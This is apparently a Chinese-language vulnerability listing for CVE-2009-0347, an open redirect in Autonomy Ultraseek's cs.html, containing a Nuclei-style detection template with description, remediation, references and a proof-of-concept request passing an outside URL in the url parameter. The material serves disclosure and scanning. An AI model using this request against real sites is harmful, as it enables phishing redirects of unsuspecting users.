CVE-2009-0347: Autonomy Ultraseek - Open Redirect

日期: 2025-08-01 | 影响软件: Autonomy Ultraseek | POC: 已公开

漏洞描述

Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.

PoC代码[已公开]

id: CVE-2009-0347

info:
  name: Autonomy Ultraseek - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
  impact: |
    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2009-0347
    - https://www.exploit-db.com/exploits/32766
    - https://www.kb.cert.org/vuls/id/202753
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336
    - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
    cvss-score: 5.8
    cve-id: CVE-2009-0347
    cwe-id: CWE-59
    epss-score: 0.03639
    epss-percentile: 0.87392
    cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: autonomy
    product: ultraseek
  tags: cve,cve2009,redirect,autonomy

http:
  - method: GET
    path:
      - "{{BaseURL}}/cs.html?url=http://www.interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a00473045022062c83bec8f0669f0e47741619d55dd11ad86b70bbe761273f8810319048863aa0221009e4a10e5f0e582d193ed010c5c8568ffcaf77e3f897a519c977ca2b8c9e93c43:922c64590222798bb761d5b6d8e72950

相关漏洞推荐